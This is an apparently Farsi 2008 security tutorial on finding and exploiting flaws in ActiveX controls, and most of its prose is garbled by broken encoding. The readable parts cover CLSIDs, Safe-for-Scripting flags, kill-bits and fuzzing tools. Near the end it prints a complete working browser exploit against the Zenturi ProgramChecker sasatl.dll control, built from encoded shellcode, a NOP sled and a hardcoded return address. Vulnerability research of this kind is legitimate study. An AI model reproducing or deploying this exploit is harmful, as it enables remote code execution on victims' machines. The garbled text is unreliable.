detecting and exploiting vulnerability in activex controlsfarsi]-detecting-and-exploiting... ·...

�

Detecting and Exploiting Vulnerability in ActiveX Controls

Shahriyar Jalayeri (Snake)

[email protected] October, 2008

Unkn0wn Security Researcher

Snoop Security Research committee http://www.snoop-security.com

�

��

�

�. �� ! � �� "# $%� �&��'� � ( )* +,-. � /,� � � (�,�� . �� 0"# 1� �2

� �� . �3�� 435 6 �& ( )* +,-. � � (�& +,7-. �7 � ��7� / 389:7�� 1� ��;<37!� =�&

/-� �# )*. (�& ( )* +,-. �0>); ��Server-Side �3 ��;<3!� �8?� =�& . @3� � � ��

+,-.* - � 4�� A B�� - � C3"D �� E ��F ;<3!� �& ( )9 �7� (�7& 4�� G

� H� :��9 I �� . � 6 �3 ��- ��> / 38�2,. �78J E7 ��7K� (� LM� �� 1 />); �

00N- I'3 00N- � �> .Firewall��0: ��;<3!� �� & �� O,� � P��,#Q � � � �& . 7* 1� G

+,7-. (�& � �� RD � �� =�& � ��;<3!� 4�� 7* )Client-Side �7��. (�� . ��

E /,� � S3"D /T�UClient E 1� 0"� ��,: /-� ��- �� V��' )* +,-. (�&��'��

�W ��. (� ��30, . :�� E (�� 6 ��30, �� & =�& � 0"# 1� �2 9 P�3? � �� / 38

/-� �� X� ; �� 6 �� Y"Z� [ ��. �7��1�� 7� /7-� \0:,- & �8?� (�� 1� ;��

�&�� &��3 ]�, ��A 4��!0-� / �:� [ �D� ��K� (� �,� ^80_ (�& /�> � ��& � �� 6

�& � ... �� ^ D� �� &��0-� �& ;�� . � ��30, �&��0-� � � 1�Aplet � ��7� �&

ActiveX �� 4��>� �& . :�� (� +-�� (�� >�� `�� T�% � � �� =�&9 �� / 38

4�� S0�� E ActiveX /-� X� ;�� 8,-� � . �7 )7* +,7-. �7 �� E7 �T�% S3a ��

�]�, ��A �8J ��3 �3;��3; (�#>�� [ �� P�3?. �7T�% �7 � �� 4�7> 4�7 �� (�#>��

/,T3b:7 �7T�% 4�7�&� �`�� (�& / �- � 4��: 3� [,T� YF � � ��>��, �� [�A � �8"c M ��

� 1� E d,& ��]�,e 4�#c �� ; 4��3� ��2�� S�"c. f�7-� 7 �#�� /:,%,%g �T�% � �

/-� �0�; ^,T�� >13 . =��&�.

h

i. ActiveXj/:,� ActiveX /-� 4�> ��K� /'�-�2 � k-3� �� /-� (��0-� . �7&��'� � �7 ��07-� � �

� �&��'� � � � �� &�, 41�� ) 4�7> �07>3� (7� � �:7 3� �7 �� 1 �� /-� �2m ��

��>� ( ��?1 ��&� ��A 4��!0-� ��3 � 4�. /'�7-�� Y�7,* (�& (��' (� R,��

�3�OLE 3COM /-� . �� /-� �< � �1o �0�T�ActiveX Y�7,* (�& (��' � � � �* �3�

/-� 4�> �0>��.ActiveX (� ��7A 4��!07-� ��3 �,� X� (�&�� ( 4p � � �� $ ��'�

�]�, . ��, � � ��IE 1� �2 ��3�c � �� * �q�,:� � 6 �&;�� 41�� (��;��

E (��ActiveX Object�&�, �� .� [,T� � �78r (�&�7� P�37? �7 ��7�� 7 � �72��

��9 � 6 ��3�, �� [ � �� (�� & ��s� � ��3 . �7& 7T0�� k-3� 4�> ��s� S�"c� �,8�

��-] ��s� � �� -0-� tu- ��.�3�, X3:r O� � E,-� E �3� � � ��. � @�> 1� $,*

v1��9, 1�,� ��3 (� � �* P�cMa� � 6 �& ��'� � � �� / 389:�� 435 � w��*.

i,�.��% CLSID

��% CLSID 7� � 1� E & (1�- �� yD (� ActiveX ��7A 4��!07-� ��37 �7&

�]�, . 1� E & � � /-�02 ��% � �ActiveX�3�, 4�� /�z� (� �"0 ��% �& . CLSID

��c E �i{ /-� �",-��& / ' �� O, . � �Q 1� O:,T �,��30, �WCLSID 4�> +z� (�& 7

�,�, (0:,�� 3� \0:,- (��:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID

� I,A� �3a �CLSID/-� (-�- (�02 �-��> E . (�& fM� �� }N� (� �-��> � �

E �� 3�3 Com/2~. �]�, ��A 4��!0-� ��3 . ��% CLSID (� 1�,� ��3 P�cMa� (��U

Com Handler/-� \0:,- �!�,* .Handler �� P�cMa� � �� * (� ��% � � 1�

��2, 4��!0-� T0�� E (�� 1 �� 3� 1�,�. �7 P�cMa� � � 1� 4��!0-� � ��30, S�� 3a �

/:� 4p �. � �0:�� (�& /2~. 1� � � �* T0�� 2 . e 7 1 �� 7�3 E7 1� (� �CLSID ��

�,�2, 4�&�W. � �CLSID � B3 Adobe Acrobat 8.0/-� .

CLSID: {CA8A9780-280D-11CF-A24D-444553540000}

�,��30, (0:,�� WSubKey & (�& CLSID �,�� 4�&�� . �7 �Subkey 7 4�M7c �7&

Ma� (��#�� k-3� 6 P�cHandlerA 4��!0-� ��3 �,� �� y�& ��s� (� ��]�, ��.

1 Native Code

�

i,i. ��% ProgID

6 /-� }N� �� 3u��F - a�� 9 �� CLSID �"� 2�[ �-] �� . (�7

� �'� �� % [2� �ProgID � . �3�� . �7��F ��% � � k-3�CLSID ��370,

�7� ��7 ��72 � (1��7�� 4�� & fM�.ProgID 4�7> 4�7�3� �7"8�Programmatic

Identifier /-� . /�:�CLSID � Prog (�7& f��. /�:7� �7��F � �72 � IP � DNS

/-�.ProgID ��7% w'�7 (�7 �& CLSID 6 4��!07-� P�37? �� 3�7, 4�7 ��7� �7

Handler ��0 � t,�? ��% w'� (� ��. 1� CLSID��2, 4��!0-� .

1� 4��!0-�ProgID � ��2 � �� u �> �� #�* /-� ). ��7% �7 � 1� 4�!0-� (� B> YT��

E �3��Subkry �� ProgID 4�; �� CLSID /-� �� 3 . � �Subkey �3� ��cMa�

�� . (�� N:� 6 T0�� 4�� ,T3� ��. S�� 3a �ADOX.Column.2.8.

k �> 1� � � �2 6 37�� E7 �Subkey �� 7T0�� 1� HKEY_CLASSES_ROOT ��7� �7

CLSID /-�.

i,�. ��T0�� E (�& �;

� (�� & T0�� 1� E &� ��0:& (� 4�> ^ D� (�& �;. � � �� E7 �� / 389:�� & �;

��2, �! � �� "# $%� 4�� S0�� . � � � 1�� 30, �#,;Safe for Scripting� Safe

for Initialization� �� . 7T0�� E7 �7 �� 7& /7,8�A ��7% �7 � 1� E7 7&

��N�, . P�3? � T0�� E ;� S�� 3a �Safe for Scripting 4�7> (��)7; /7 Mc

6 �>� �� X� ;�� I a 1� �� \,%0: B�� (��A � [ �D� � ��3�. 7� � ��7, �7

� E7 ��7s� � � P�cMa� w'; � ��3� � 4�> (��;�� ;�� 82� d,& �� & T0��

�:7 3� �7 �� (�7& ��71 I a 1� �� ["cScripty �7�� Java Script � VB

Script �� .� � �� 4��!0-� T0�� (�& �30 � �& /2~. 1� ��30, 4� �� (�& ��1 I a 1�

�77� �:77 3� �77 �� 77?�� =�77& (�77 O77U��. �77 R�77�0:�� k77-3� (��)77; /77 Mc �77 �

IObjectSafety �]�, ��s� . E7 �7,� (0:7,�� 7?�� % 1� 4��!0-� � ��30, �0�T�

�� (��); / Mc �� T0��.

i,�. ��% Kill-Bit

Kill-bit E �DA�� 3a � Bit /:,� .Kill-bit � ��% E /7-� (0:,�� .CLISD

6 (7� � �7�3; /9 27-� k,7r 7& �7 � X� ;�� 6 ��>� ��% � � (�� & [7�A

�

��0:,� (��;��. (�7& 7T0�� & ( )* +,-. 1� (];38� (� L�� 1� /'�-��

��2, 4��!0-� 6 /-� �3�3 )* +,-.. ��% Kill-bit �,��30, �� ,�, (0:,�� :

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\CLSID of the ActiveX control

�.<3!� (�#>�� ActiveX ��0:& (� � � �� [�A � ^uD� � �&�� 6 �& . � �7& �7;� � �7 ��3� � 6 �� 1�

1� E & � ��ActiveX& /'� E & (� �� V3;��3; (�& ( )* +,-. ��30, �. ��, � � ��

+,7-. �7 � �37�� 7�� 1� 6 ��370, �� & T0�� 0�, �� 3�� & ( )* +,-. 1� 1� �0-�

�� A �-� ��3 �& ( )*.v1��9, E & �-� � � �� .

�,�.�� 0'� �� 1�

1� ��COM Object �� & �� 30, �& IE k7�� -� S�U ��IObjecSafety

� � ��0'� �� 1� +�3 6 /-�Crash ��3> �. �� . 7�� 7 �7��30, �;��0'� �� 1� � � [7 o�

V3;��3;* �>� 4� . $,.� 4��7� �0>3� X� ;�� E �� 4��!0-� (� 4��,& 6 �& T0�� 1� �

� � �� >� T0�� (��;�� & �� ;�� ;��0'� �� 1� [ o� 1� �2 ��30, �3� � . ;<37!�

�-� � ��30, �� /-� �?�� =�& � �;��0'� �� 1� � � [ o�. �7& T0�� 1� �� k-3�

�� I �� ;�� '�U �� &�� 30, .

�,i.�& (�� 1��

� �2 :�� [�A �� 30, �� (��& L�� 1� 1� �9 �&�30 V�3�� 6 �>� �3 T0�� E ��3 / 38

�� T0�� 3� �Handle /-� �& (�� . E ;� S�� 3a �ActiveX �7 �� 07>� E7

� /'� �� ]� �� E 1� (�� 3�cHandle E7 ��7K� (�7 �37� =�& ��30, 6 ��

�>� '� � �- ( )* +,-..

�� 3u��F * 6 �> �-� 0�,ActiveX P�3? � �� & SFS� 6 �7�� 4�7> (��); �� 7

� ��0:& �: 3� � �� [�A O9 2-� (�& ��1 �8,- �7�. ��30, O9 2-� (�& ��1 1� 4��!0-� � �

�� -� PMJ � �� . 0�� T 30, �& 6 ��Property �7&� ��7% � �7-� �� &

�� . ��3�c ��% E /,UM? YD� � �, �� . �� 1� 6 T0�� E ��0'� �� 1� �8?� [,T�

E (��Method/-� �� .

2 Safe for Scripting

�

(�& T0�� (� �� & �;� � 1� � � �2 ActiveX /,8�A 6 v�W SFI�/-� . �8,7-� �7

� �� I �� T0�� 0 ��* ��3�c � �� & 4�� 30, �;� �. �7,� I7 a �7 � 1� �& 4�� I ��

� (��c � � - 6 '� � �- �3�F ��D�� 30, ...�>� �0>�� 4�F � ��.

�,�.��u� (�&�30

(��); ��ActiveX ��3�c � SFS /-� G 3� � �� 4�#c . � �& T0�� P�37? � �� SFS

��>� ��;<3!� (� �3� =�& ��30, 6 ��, (��); ��. �� 37�3 (�7&�30 �7-� �7

�7 $,* �� ?�� =�& � 4�� 4��!0-� �3- �� u� � � � �� (�&�30 1� ��30, T0��. �37a �7

6 �� (� � �� 6 � � �� 30 E 1� 4��!0-� � ��30, S�� (��;�� \0:,- (�� 8 �'

�� s� � � � �& �� .

�. �-� (�& ��ActiveX�& �� <3!� (�& L�� -� 1� G*ActiveX ��7� \&�7' (�7 �7� � �7&�� $7� � � �� &

\,�2, yD /-� 1�,� ��3 ��,0 389:�� P� �% . 0�� W (�� & 1� $,*0�; +z� (�& T �

��,� (1�-�� -��> �� \0:,- (�� . � � � 1� �� \0:7,- (�� 1�� 4�F � �& T0

� (�&��'� �� k-3� � � ��3d Partry �7��, +z7� �W \0:,- (�� .0�� (�7& 7T

ActiveX P�3? � DLL (�& ��0:�� OCX��3�, &�� .

�,�. ��ActiveX Manager

�� 0�; +z� \0:,- (�� & T0�� w'� (� +-�� (�� . 7T0�� 1� O:7,T ��

�&�, �`�� W � �� 3�3 (�&. 6 /,D7�� 6 7T0�� 7� � �,��30, �� 1� 4��!0-� �CLSID

6ProgID � T0�� [ �' �� 2 6 ...� �* .� � � P��2 � 1� � � �2 � �Q 1� L��; �,q ��

+z� (�& T0��; [ �' +T�A �� 6 �> �< o� �� cMa� 4�F � �0�HTML /-� . �� 4��

�,�2, 4�&�� 1� � �e.

3 Safe for Initialization

�

4��

�,i. ��ActiveXplorer

(�& T0�� w'� � �� (� C�c (��ActievX. ��7� P�7��2 � � �7Q 7 4�M7c ��7� �7 �

ActiveX Manager�� 4�� "0 �;� � E 6 . �� ,T��. �� ;� � ��3� � �& �30

/-� fM� &.�,�� 3� 1 P�cMa� � S�� 3a �:

Public Property Get IconSizeX()()()() As Long ' Gets/sets the width of the images in the list. Public Propety Let IconSizeX()()()() As Long ' Gets/sets the width of the images in the list. Public Property Get IconSizeY()()()() As Long ' Gets/sets the height of the images in the list. Public Propety Let IconSizeY()()()() As Long ' Gets/sets the height of the images in the list. Public Property Get ColourDepth()()()() As Long ' Gets/sets the number of colours the image list will suport. Public Propety Let ColourDepth()()()() As Long ' Gets/sets the number of colours the image list will suport. Public Property Get ImageCount()()()() As Integer ' Gets the number of images in the Image List. Public Sub RemoveImage((((ByVal vKey As Variant)))) As Integer ' Removes an image from the image list.

/-� 4� . /-� � T0�� E �� ,T��. 1� G* P�cMa� � �. 4�Mc 6 �,�2, 4�&�� 3u��F

� �& �30 6 �& 3Zc �� /:,T ��3�c � �30 � ��3� �� ( ��% �,� ��,�3� 6 �� )9, (��

�

�3�, �`�� 3Zc & ��3 ��. ��,e �`�� Zc� � �Q 4�� P��,�3� � � �0�T�) �7`�1 �,� �&�; �

��0:&(. 7� � �� * 6 � P��,�3� � � 1� ��30, �� & 4p 1� �2 /7-� �370 7& ��. �7

�� S�-�� . � �30 & ��3 1. /#� �� % ��30, 6 �30 �-� � �� 1� 4��!0-�. ��

�7 �7* �370 7& ��37 / 389:7�� [�A � ��u� � ��30, 6 �30 E � ^80_ ��% . 7� � 1�

��3� � �Q �� /:,T �� P��2 � � Property �& ( /-� T0�� & . /7-� ��7A ��

�&� $ �e �,� �� (0:,�� T0�� & (� 4�> /�� % . �� 4��7��i �� 7� �7 � 1� � �7e

�,�2, 4�&�� .

4�� i

�,�. ��TypeLib Browser

�� (� /-� }N� �. �� 1� �� 3u��F �� TLB /7-� 4�7> �0>�� & .TLB �7&

(�#7-M� 4��7�� cMa� �� 0:& (� � (�#8 �'COM �7��2, (�� 7�� 37� �� . TLB �7&

��0:�� E P�3? � � [%0: [ �' E +T�A �� 30, TLB RD 6 B3 �� P�3? � � �

(�#8 �'OCX6 DLL � �EXE��3> &�� .�> �0!; �� 3u��F ActiveX (�3T3�2� � �* �,� �&

�3� � �&COM �� 4�> �0>3� . 7& 4�� cMa� � 6 �,��30, �,� �� 1� 4��!0-� � � � ��

� � �* �3� \0:,- (�� 0�; +z� (�& T0�� 1� E . 4�� ,�2, 4�&�� .

��

4��

�,�. ��OLE/COM Object Viewer

��OLE Viewer 1� P�7cMa� +:7� (�7 +-�� (�&�� 1� � � �2 �,� ActiveX �7&

/-�. $ �e 6 �3� � �& /,8�A �� Interface \0:7,- (�� 7 �0�; +z� �& T0�� 6 �&

� � ��2 � � �� T0�� & � B3 P�cMa� $ �e 6 �W �7�. ^�7� � �,��30, ��20�* � ��

� 1��9 ! /-� �. �' � z�� (�#,;� � 1� �2 �� 1� 4��!0-� � yD [,T�. ��7A ��7� � �

�� & T0�� Q /-� P�3? �SFS� SFI�� /:,T 6 �� 4�> (��); �� . 7-� �0 1� 4��!

,��30, 4�> �< (�&�� =�7& � � �0��- � ��r � ��r �� 3� (�& =�& /:,T �

� 3> � E <�� / 389:�� [�A (�&. �7>��, �& ( )* +,-. w'� 6 P�cMa� +:� 1� G* �8U .

v]�, E"� �& �1�' �� &�� 1� (�& ( )* +,-. w'� (�. P�37? �7 �7& ��7� �7 �

��3� � �� & T0�� 3� (�& (�� 7�&�, ��A $ � 1. ��3 6 �&�30 . ��7� �7 � 1� G7*

�]�, ��A �W ��,0�� &��'� � � � k-3� �3 1. �0� . �7 � P�cMa� � � /'� �� 1� G* �W

�7* 7T0�� E7 ��37�� 7 � ��3 / 389:�� [�A � � 4�� -� �� & 4�� ;<3!� E ��3�c �

� �.� �� 6 �0�; yD �� 1� (� 4�� OLE/COM Object Viewer �7,&�3� 4�&��7

��.

��

4��

¡.�&�1�' yD � $� � � ��Fuzzer yD �� E"� � � �& ( )* +,-. w'� �� 30, �� &

\�2, . �-� (�ActiveX 3� ��!0 (�& �1�' �& /-� 4�> �0> . 6 � � � 1� �7�� yD � �#��

�1��9, �&�1�' � � �� =�D .

¡,�. COMbust

(�# )* +,-. �-� (� �&�1�' YT�� 1� �2 �3¢ �� ActiveX �7& COMbust /7-� . �7 �

G��!�� 1�'Black Hat S�- �� i££��> yD . 7� /:7,T � L��7W (��3� ��

Interface/-�� T0�� E (�& ./-� 1 ¤> � �� (�& �;� � 1� ��:

• '� � �- ( )* +,-. �-�

• (��c � �- ( )* +,-. �-�

• �� 0-� / ' ( )* +,-. �-�

• ��u� (�& �30 ( )* +,-. �� -� ) � �� f��. 6 [ �' (��(...

• & L�� $ ��'� /,8�A�� 1�' (�

• $ � � /,8�A ��% �' $,* (�#>�� 1�'

��

• �� ' k� /g ��

• �-� 1� �,&*Interface�� (�& �30 � �

� � � �7 �,&�3� �* ��. � �. � �� & �� ,� (� � � �& �;� � ��. �7-� (�7

6 ��& 1� �,��30, T0�� E ��CLSID � ProgID-� �,�� 4��!0. S�� 3a �: with a CLSID : COMbust -c {EF99BD32-C1FB-11D2-892F-0090271D4F88} with a ProgId: COMbust -p msxml2.domdocument.3.0

[ �' E �� XML ��7� � COMbust.xml �7 B37 P�7cMa� �7� /7-� �37�3

�30 � �' $,* ��% 6 �� 1�' (�#>�� 37�� ,&* ��. �-� 1� � � �� &. �7W

�,�� (1�- �zN> �� 1�' /,8"c [ �' � � ��% ],¥� � �,��30, .

¡,i. AxMan

�1�' E �� web-base/-� .AxMan k7-3� H D Moore S�7- �� i££¦ 4�7> �07>3�

/-�. �& �;� � 1� �2 ( /,8�A 6 �� ' � z�� /-� � M�. P�3? � ��. 4��!0-� (�

[7 �' k-3� � � ��0� �� 1�axman.exe 1� O:7,T Interface 7� � � �7&�30 6 �7&

1�,� ��3 P�cMa�Axman�,�� ,q �� . (�� 1 P� axman.exe�� D� � 0 /7�� (�& T

�W \0:,- (�� 0�; �0:�� . Y �� 1 � ��£ �� %,A� i /7-� ],¥0 /c�- . ��7Q� 1� G7*

,8"c �� $� (�� - E (1�� 4�� ,��30, P�,8"c�� 1��9 �� 1�' P. $7� �7 � ��

k-3� 4� . /-� � P�cMa� 1� 4��!0-� �axman.exe �-� � �1��79, �& T0�� E� E�. �7

E 1� 4��!0-� �� 4��: 3� �� $,* /-� �1�' �� (� 4�� 0p S��3T ��- . �7-� (�

Exception (�& * 4� . $, �7 �� ;�� E �,��30, IE 6 Attach �7-� �� 70� � 4�7�

�,��.0�, P�cMa� (��,�� D�� 1�' ��-� � �,��30, . �� #�� 1�' � � �2� � �. �02�IE 6

/-�� [�A .

¡,�. ComRaider

k�� 4�F � C�c �1�' E GUI k-3� �� 6 David Zimmer (��7>. ��7� \,� 1� Idefense

/-� 4�> �0>3�. � �7"0 [7 �� P�37? �7 �7& ��7� 7� � 1� �� . �7� �� 7#,;� � ��

��2, . ��0:& 1 ¤> � �1�' � � (�#,;� � ��:

• '� � �- ( )* +,-. �-�

• . �-�(��c � �- ( )* +,-

• �� 0-� / ' ( )* +,-. �-�

• ��u� (�& �30 ( )* +,-. �� -� ) � �� f��. 6 [ �' (��(...

��

• w'� (� (�30� �� E §-�Com Object�& (�0�; /��

• k-3� ��CLSID � ProgID

• k��GUI

• ��% � � �& T0�� /:,TKill-Bit4�> /��

• (�& T0�� /:,TSFS � SFI

• 6 �& �30 6 (�#-M� �� /:,TProperty/2~. & P�cMa� � � � �&

• $ �eExecption �� 1�' �� 1 �� & ) �30-� � �� P�3? �(

• �� 1�' ��% 4�F � �30 (��OllyDbg

/-� 4�> �< ��3 1� $, ��,: �� (�& �;� �.�#��,* ��;��3� � �Q � � ) � (� �'U

(�0� ( /7-� �� 1� 4��!0-�. k7��GUI 7& �7 B37� P�7cMa� $ �7e � �# �70� (�7

Exception /-� �& (� �'U (� +-�� ;� � . /7-� 4��- ��,: �1�' � � � �� . �7�

�3� 4�#c � �� 1�' � � � �� 435 (];�� , 4��. �1�' � � 1� �,� �T�% � � � ��

\�2, 4��!0-� �& ( )* +,-. �-� � w'� (�. 4�� ¡�,�2, 4�&�� 4��D8A3' �� .

4�� 5

�h

¡.S��0 (�# )* +,-. 6 �� 3 ��, 1 �� ,T�� P�cMa� w'� � �-� 1� G* � �# )* +,-. w'� RD �� $�

� ¨, ��, . 7T0�� E7 �7��30, �7� � �7& ( )7* +,7-. �� @�3�� W \�2, �D- $� ��

ActiveX �1�- ��>. 6 �� g �� . �: 3� � �� (� � (�#8 �' � � � �Q 6 ��F �& T0��

* +,-. ��30, [,T� YF � � �� 4�> 6 ©7,& � �7- 6 �0�* �� '� � �- �3� �K�� (�& ( )

� �� 0-� / ' ...�� . �� /'� . � ��z5� �� 30, �� & ( )* +,-. 1� �2 � �� 7& 7T0

/-� �� u� (�& �30 RD 6 4�> �< ( )* +,-. 6 ��.. +,7-. ["c �� 6 \�2, �D- � ��

�& ( )*(� �W � �� \&�.

¡,�.'� � �-

�� <3!� (�& L�� u� S�U Yc �� 1� �2 '� � �- �>��, �&��'�. ��

��, � �ActiveX � �� \,0:& � �#;� 6 �&�> ��1�� 0:s (�� 6 '� � �- u� 1� �,� �&

)* +,-. 6 ��,0 389:�� (�& E,�2� 1� �2 1� 4��!0-� �� 4�� / 389:�� ( . �7 �� 7�3e (�

Program Checker $ � � �6¡6£6¡��\,�2, �-� �� . � � 1� �,� �T�% � � � � /":A ��

�� \,&�3� 4��!0-� � ��. /-� � �� 3 +-�� U 1� $, �,� �� [,T� ) / 389:�� [�A

)* +,-. � �#>�� F �� 3: (�.( � �� T0�� 0ActiveX �� \,�7, �� '�. �7 � ��7�

T0��sasatl.dll /-� . �� T0�� (��;�� 1� G*ComRaider �7&�30 6(�#-M� 6 �,��30,

� Property �,�� 4�&�� T0�� (�& . (�� 37�c �7 ( ��% ��3� � �&�30 1� E &

��3� � ��30, �� )9, r �� -� ��3 ��3� 6 �3� =�& �� 1�- � . (�7 S�7� �37a �

(�� 7� �D�37� �7-� �7 �#7�� ,��30, 6 �� 0-� / ' � � '� � �- ( )* +,-. w'�

String� 1��9 6 �� . S�� 3a �:

Sub DebugMsgLog ( ByVal bstrMsg As String )

�� ,�,�, DebugMsgLog �0>� @3� 1� �� 3;�. � � � ( )9, (�� 3�c � �� 3;�. E

/-� (�.\,��, /-� �� 1�' � G*. 4�� -� �H,0�¦�,�� 4�&�� :

4�� 6

��

/77-� 3; M �77� �77H,0� . �� 77� �77 ��

OllyDbg 77& �77 Debugger (77� �

�,��30, S�� ,��. E7 ��7� 1�' ��& ��

#0�� % 6 �30 � �7 1 6 �7,�� -�

��770'� �77�3� 6 (�� 77% $ ��77'� �77

��&�, 1� �3� 1� ��!0 . �� 4��

�#7�� 7� � �7��& �� 7& /7�� /,D��

�£�� 0�� A ��7� �7 (�� 37�c �

, 4�&�� 4�> I ��,�2. $ ��7'� �

/7-� (7� �7,! P�7cMa� � ��% � �

�7,� �7 �� 70'� �7� � � �,&�3� � \,�,

�� &�3� ],¥�. ��% � �� S�� 3a ��¡¦ 0�� Av�� .

� 1� 4��!0-� � ��7cMa

�7�� 3z7� ��

� �e � \,��30, /-� �

I'3 ��,0 389:�� E

�77 /77-�\,. Y77T��

�77 � 1� �77� O77>��

��37770, P�777cMa�

�7 7; 4��7>� 6/>��

/-� '�. �7� �3u��F

=M77� 77 �77,�,�,

(�77& ( )77* +,77-.

�7 �7�3e � � ��

(�777�ESP /777�� 6

ESI 4��77>� '�77 �77

��2, . 1� 7� � �72

�77 � �77,! P�77cMa�

� � �e 6 3z�1 �0�*

1� �777� �777� /777-�

��

��> �: 3�1�SHE Handler�&�, . L�� 1� �2 � �� ( )* +,-. � � �,��30, �3��SHE

Overwrite � � Ret Overwrite�,�� / 389:�� . 1� ��;�7��3� �7� � �7> �2� � [,T� �

L�� 28"c 435SHE Overwite\�2, X�N0�� L�� 6 ��>� @Ma� � ) L�� 7-�

SHE Overwrite�T�% � � �8?3U 1� 6 /-� ª�� 7-� � «7¬ /c�7- �7 1�7,� �3� � 1

��.�1��9 �,� L�� [ �� 8"c P�3? � �. Po�% �� \�2, �D-.(

<object id=expl classid="clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5" ></object> <input language=JavaScript onclick=exploit() type=button value="Launch Exploit"><script> // this is part of ( Detecting and Exploiting ...) article by snake // Zenturi ProgramChecker ActiveX (sasatl.dll) Remote Buffer Overflow // it maby dos'nt work on your system , for various reasons ! such as protections against buff attack and so on ... function exploit() { var shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" + "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" + "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" + "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" + "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" + "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" + "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" + "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" + "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" + "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" + "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" + "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" + "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" + "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" + "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" + "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" + "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" + "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" + "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" + "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" + "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" + "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" + "%4e%31%75%74%38%70%65%77%70%43"); var bufer = unescape("%41"); var nop = unescape("%90"); var ret = unescape("%7C%3E%90%7C"); // return address , jmp ESI from ntdll.dl --> 7C903E7C while (bufer.length < 838) bufer += unescape("%41"); // fill buffer with A charZ while (nop.length < 2000) nop += unescape("%90") ;// NopSlides var payload = bufer + ret + nop + shellcode ; // our payload expl.DebugMsgLog(payload); // lunch the exploit! } </script>

�7-� X378u �7H,0� � �W \0:,- (�� V3;��3; [ o� � �� / 389:�� /-� �2m) f��.

�3�, + ;� k-3� /�;1�(. �>� � �& ®'�r �3�� 30, [ o� � � 1� �2 � ��

�� A �W \0:,- (�� 4�> �0>3� PMJ ��3; � �. :�� & �� [,T� YF � ��7� / 389

(�� L�� 7 � 1� 6 �7& ( )7* +,7-. �7�� ,0 389:7�� 7� � (�7& L�� 0:7�SHE

��

Overwrite� ]� �� . ��,0 389:�� E �. 1� 4��!0-� � ��30, �� & L�� 1� � � �2

L�� 6 /7>�� 7* �� I'3 Heap Spray k7-3� ��7 Y7T�� 7� /7-� Skylined (�7

/ 389:�� ActiveX�> �0'; �� & . �3� (� � (�#>�� . 1� G*Heap Feng

Shui �,� ��> @��. L�� zz P�3? � �T�% � � � �#0�� $�Heap Spray t ��

/-� �0��* �..

¡,i.�� 0-� / ' � (��c � -

'� � �- ��F �,��30, �& ( )* +,-. ��3�� w'� (� �7 (�� 37�c �7 ��!0 ��%

� �H,0� � 4�� 3�Exception �,�� -� �& .\0'�,� t �� (� (� ��3e ��, 1 � � ��. �37a �

��3� (0"� ª�� 1� �& ( )* +,-. ��3; � � �8� . (�#>�� ,��30, w'� P�3? ��

�& ( )* +,-. ��3�� k�� S3"D �,�� / 389:�� ..

¡,�.��u� (�&�30

)* +,-. (�& ��3; � � +T�� 1� �2 [7�A �7�3� � �& T0�� z5� �� #�� /!; ��30, �� 6 (

�>��, �& ;�� 4��!0-�. 1� 4��!07-� �7 �7� 6 /7-��D � � � ��u� (�&�30 ( �)* +,-.

$,* �� &�� 6 fM� E (�&�30 v�,. 7� 4��7- �7W (�7 S�7� E7 �7 �� 8b: � ��

\��. �� (�30 �,�� 'DownlaodandExecute() �7>� �0>�� 3�� T0�� E �� . �7 �

[ �' � /-� 4�> �,�D� �. V�-�1�� '�� (�#8 �' (��;�� (� �30 �&( �� '� �

��2, V�-� 1�� . � � ;� S�U 4�7> (��;�� (�#8 �' � � �& / �- �� E� (� �>�� 30

(�7& ��7 3;�. �� X� ��!7? E7 �� 30 � � V�3��' � 6 ��30, ;<3!� E 6 �>� �0>��

�� (��;�� V�A \0:,- �� '�� E 6 �� 3 . �7,8� 6 �7> 7�< 0�,* �� 3u��F

�& T0�� S�"c� 6 ��3�, ��s� �� -0-� tu- �� 7�� O ��7r ��3; d,& � � ��

�� 3�� -0-� ) �-0-� tu- � �:� �� Limit��2,e �� 3� \0:,- � .(!

+,7-. �7�3�� $ �",* � I8u P�3? � �� ?�� 1�' �& ( )* +,-. � � w'� (�

�& ( )*�� 3�� 1��9 )\0:& @Ma� � �. �3�� 1� � �2� � � (. t�� M �� \& � � � [,T�

-�/ �� 30 E /-� �2m � 1 SaveAs() �� 30 E � � � moon() � ��u� (�30

�>� )* +,-.. 7cMa� 7� � � �7& �� 3;�. 6 ��3� �-��& ( )* +,-. ��3; � � w'� 4�� P�

�>��, �& �30 . �7& �370 ( )* �� 3;�. 6 �� /A� �. � � � �& �30 �-� �� 2� 1� �2

>�� [ �' (��;�� 3� / �- � �� 1� �#�� 30 E /-� �2m S�� 3a � 6 �>� � �0 �7 �

��3; � � �,��30, P��1 �"� � �� (�& �� & [ �' 1� �7,� �� 7& / ��r

��

� �� , .�� 1� � �& S�� '�Program Checker 6 \,&�7, ��A �-� ��3 ��

